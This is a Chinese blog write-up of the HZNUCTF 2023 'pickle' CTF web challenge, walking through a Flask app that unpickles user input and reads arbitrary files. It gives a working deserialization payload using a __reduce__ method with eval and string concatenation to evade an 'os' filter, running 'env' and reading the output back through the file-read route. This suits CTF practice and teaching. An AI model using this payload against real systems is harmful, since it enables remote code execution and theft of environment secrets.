[HZNUCTF 2023 preliminary]pickle

于 2024-08-27 22:35:47 发布
阅读量317 收藏 7
点赞数 5
文章标签: web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_80243833/article/details/141612988
版权

[HZNUCTF 2023 preliminary]pickle

点开之后源码如下:

import base64
import pickle
from flask import Flask, request
 
app = Flask(__name__)
 
 
@app.route('/')
def index():
    with open('app.py', 'r') as f:
        return f.read()
 
 
@app.route('/calc', methods=['GET'])
def getFlag():
    payload = request.args.get("payload")
    pickle.loads(base64.b64decode(payload).replace(b'os', b''))
    return "ganbadie!"
 
 
@app.route('/readFile', methods=['GET'])
def readFile():
    filename = request.args.get('filename').replace("flag", "????")
    with open(filename, 'r') as f:
        return f.read()
 
 
if __name__ == '__main__':
    app.run(host='0.0.0.0')

接着我们对代码进行分析:

base64:用于进行 Base64 编码和解码操作。

pickle:Python 的对象序列化和反序列化模块,可以将 Python 对象转换为字节流进行存储或传输,也可以从字节流中恢复对象。

Flask:一个轻量级的 Web 应用框架,用于快速构建 Web 应用程序。

request:用于处理 Flask 应用中的 HTTP 请求数据。

  1. / 路由:
@app.route('/')
def index():
    with open('app.py', 'r') as f:
        return f.read()

这个路由函数在用户访问根路径(/)时被调用。它打开当前目录下的 app.py 文件,并读取文件内容返回给客户端。

  1. calc 路由:
@app.route('/calc', methods=['GET'])
def getFlag():
    payload = request.args.get("payload")
    pickle.loads(base64.b64decode(payload).replace(b'os', b''))
    return "ganbadie!"

这个路由函数响应 GET 请求到 /calc 路径。它从请求的参数中获取名为 payload 的值,然后对这个值进行以下操作:

首先使用 base64.b64decode 对 payload 进行 Base64 解码。

接着使用 .replace(b’os’, b’') 将解码后的字节串中的 os 替换为空字节串。

最后使用 pickle.loads 尝试反序列化处理后的字节串。如果这个字节串不是合法的序列化对象,或者在反序列化过程中出现问题,可能会引发错误。最后返回字符串 “ganbadie!”。

  1. /readFile 路由:
@app.route('/readFile', methods=['GET'])
def readFile():
    filename = request.args.get('filename').replace("flag", "????")
    with open(filename, 'r') as f:
        return f.read()

这个路由函数响应 GET 请求到 /readFile 路径。它从请求的参数中获取名为 filename 的值,然后将这个值中的 “flag” 替换为 “???”。接着尝试打开这个文件名对应的文件进行读取,并将文件内容返回给客户端。如果文件名不合法或者文件不存在,可能会引发错误。

if __name__ == '__main__':
    app.run(host='0.0.0.0')

这部分代码确保只有当脚本直接运行时才会启动 Flask 应用。app.run(host=‘0.0.0.0’) 表示应用将在所有网络接口上监听请求。

这里用os字符串拼接绕过:

import pickle  
import base64  
  
class rayi(object):  
def __reduce__(self):  
#return eval,("__import__('o'+'s').system('ls / | tee a')",)  
return eval,("__import__('o'+'s').system('env | tee a')",)  
  
a=rayi()  
print(pickle.dumps(a))  
print(base64.b64encode(pickle.dumps(a)))

def reduce(self):定义了特殊方法__reduce__。这个方法在对象被pickle模块序列化时会被调用。它应该返回一个可调用对象和一个参数元组,用于在反序列化时重建对象。

return eval,(“import(‘o’+‘s’).system(‘env | tee a’)”,):这里返回一个元组,包含两个元素。

运行代码之后得到:

在这里插入图片描述然后我们构造payload:

/readFile?filename=a

运行之后得到:

在这里插入图片描述假的flag ,接着我们在环境变量中成功找到flag

Alpha first
关注
A preliminary study of anaerobic treatment
12-08
本研究是一篇关于厌氧处理初步研究的学术论文,主要探讨了厌氧处理技术与微电解技术结合应用于葱醌染料废水处理的实验研究。由于染料废水具有高色度、难降解有机物、高盐分和碱性等特点,传统的生物处理方法由于其低...
pickle反序列化
rev1ve的博客
12-22 1628
与PHP类似,python也有序列化功能以长期储存内存中的数据。pickle是python下的序列化与反序列化包。python有另一个更原始的序列化包marshal,现在开发时一般使用pickle。与json相比,pickle以二进制储存,不易人工阅读;json可以跨语言,而pickle是Python专用的;pickle能表示python几乎所有的类型(包括自定义类型),json只能表示一部分内置类型且不能表示自定义类型。
[HZNUCTF 2023 preliminary] 2023杭师大校赛(初赛) web方向题解wp 全
Jay17的博客
08-16 1420
[HZNUCTF 2023 preliminary] 2023杭师大校赛(初赛) web方向题解wp 全
NSSCTF第13页(3)
wwwwyyyrre的博客
11-29 222
所以注册用户admin'--并修改密码就可以登录admin,在home页面的查询有两种回显,exist或no user,显然是布尔盲注,需要注意的是数据库是sqlite,查询语句不太一样。print(("%s表的%s字段数据: " + data) % (tab_name, col_name))先注册一个admin'--+ 因为admin'#报错了,用这个注册的admin来覆盖之前的那个admin。#使用时改一下Success_message、url!tbl_name:记录所从属的表名,如索引所在的表名。
CTF题型 Python中pickle反序列化进阶利用&例题&opache绕过(1)
2401_84009679的博客
04-12 984
训机构动则几千的学费,着实压力不小。自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!**
HZNUCTF2023 web
weixin_63231007的博客
05-07 1801
HZNUCTF校赛 赛后复现
ICPC-preliminary
03-26
标题“ICPC-preliminary”很可能指的是“国际大学生程序设计竞赛(International Collegiate Programming Contest,简称ICPC)的预赛”。ICPC是一项全球性的编程竞赛,旨在推动大学学生在算法、编程和问题解决方面的...
FS8836 Preliminary Data Sheet
09-02
根据给定的文件信息,我们可以深入探讨FS8836这款芯片的相关知识点,这是一款由FameG公司研发的产品,其初步数据表发布于2009年5月20日,版本为0.6。以下是对FS8836芯片特性和功能的详细解析: ...
Preliminary Knowledge of
11-12
The Concept of Random Process 1.1.1. Random Experiments Rolling a die and observing the number that shows up Tossing a coin Strength of signal received by a Mobile Station Call arrivals to a Web ...
Preliminary Monty-开源
06-29
【标题】"Preliminary Monty-开源"指的是一个与ZX-SPECTRUM计算机平台相关的开源项目,名为“初步蒙蒂”。ZX-SPECTRUM是一款经典的8位家用电脑,流行于20世纪80年代,尤其在英国及其周边地区深受欢迎。这个开源项目...
Preliminary results on positizable systems
02-10
正系统和可正化系统的研究是控制系统理论中的重要课题。正系统是那些无论初始条件和输入信号是非负的,其状态和输出始终保持非负的系统。这类系统的状态被限制在正象限的“锥体”中,而不是在整个空间Rn中。...
BCM53134M Preliminary Data Sheet
04-14
### BCM53134M超低功耗千兆交换机关键知识点解析 #### 一、BCM53134M概述 - **产品定位**:Broadcom BCM53134M是一款超低功耗、高度集成且成本效益高的智能管理型千兆交换机。 - **设计基础**:该交换机的设计基于...
Lecture01-Preliminary.pptx
09-18
Lecture01-Preliminary.pptx
preliminary-study-master.zip
最新发布
08-30
中秋主题
[HZNUCTF 2023 preliminary]ppppop
m0_70819573的博客
04-22 466
base64解密后得到序列化的字符串:O:4:"User":1:{s:7:"isAdmin";很简单的pop链构造,class A __destruct()->class B __call()通过抓包可以发现base64加密的user cookie。通过payloadpost传参获得flag。1.代开环境,发现一片空白。将零改为一后可以显示源码了。
CTF题型 Python中pickle反序列化进阶利用&例题&opache绕过
2401_83642079的博客
04-07 421
V操作码是可以识别\u (unicode编码绕过)无R,i,o os 可过 + 关键词过滤。特别是命令有特殊功能字符。无R,i,o os可过。
HZNUCTF2023初赛
Emmaaaaa's blog
03-27 1698
cpdd:摩斯密码 classical:base + 凯撒 child_OTP:异或 child_quadratic_residue:直接开根法 child_proof_work:暴力破解uuid4{8位 - 4位 - 4位 - 12位} chile_steam:异或 child_RSA:基础RSA解密 RSA1:维纳攻击 很简单的数学1:离散对数(discrete_log) child_gcd:费马小定理 (a ** (p-1) = 1 mod p) RSA3:模运算法则,离散对数
preliminary 传感器
07-24
在工业应用中,preliminary 传感器可以帮助监测和控制生产过程中的温度、压力和湿度等参数,以确保产品质量和工艺稳定性。 此外,preliminary 传感器还可以用于智能家居系统,例如自动灯光控制和温度调节。它们可以...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值